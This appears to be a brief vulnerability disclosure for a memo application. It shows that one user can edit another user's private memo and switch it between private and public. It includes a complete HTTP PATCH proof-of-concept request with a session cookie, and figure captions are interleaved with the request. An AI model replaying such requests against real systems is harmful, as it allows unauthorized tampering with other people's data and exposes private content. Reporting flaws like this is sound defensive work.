It is possible for a user to edit private memos from other users and also change their visibility, making them public. Also the user could change the visibility from Public to Private or viceversa.
Figure 1
Memo ID: 1.
visibility
from PRIVATE
to PUBLIC
:PATCH /api/memo/1
Host: localhost:5230
Content-Type: application/json
Cookie: memos_session=MTY3MTU3OTA0MXxEdi1CQkFFQ180SUFBUkFCRUFBQUh2LUNBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBSUFCQT09fOcAjJ2GPp5-cAXssL0lYKwcUk2hOR1JVz35py1Cn8sK
Connection: close
{"id":1,"content":"Test edited by another user","visibility":"PUBLIC","resourceIdList":[]}
PUBLIC
to PRIVATE
.